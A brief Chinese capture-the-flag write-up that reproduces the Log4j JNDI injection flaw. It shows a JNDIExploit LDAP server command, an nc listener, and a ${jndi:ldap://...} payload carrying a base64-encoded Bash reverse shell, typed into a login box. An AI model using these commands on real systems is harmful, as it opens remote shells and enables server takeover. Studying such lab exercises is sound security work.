web-wp

Log4j复现

进入题目

在vps上启动一个简易的ldap服务，用JNDIExploit脚本
vps启动服务
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsip -l 1389 -p 8180

在开一个会话监听端口
nc -lvvp 4567

构造脚本注入,base64编码bash反弹脚本bash -i >& /dev/tcp/ip/4567 0>&1，在登录框里输入
${jndi:ldap://vpsip:1389/Basic/Command/Base64/YmFzaCAtaSA%2bJiAvZGV2L3RjcC82Mi4yMzQuNzIuNTMvNDU2NyAwPiYx}

注入成功，得到flag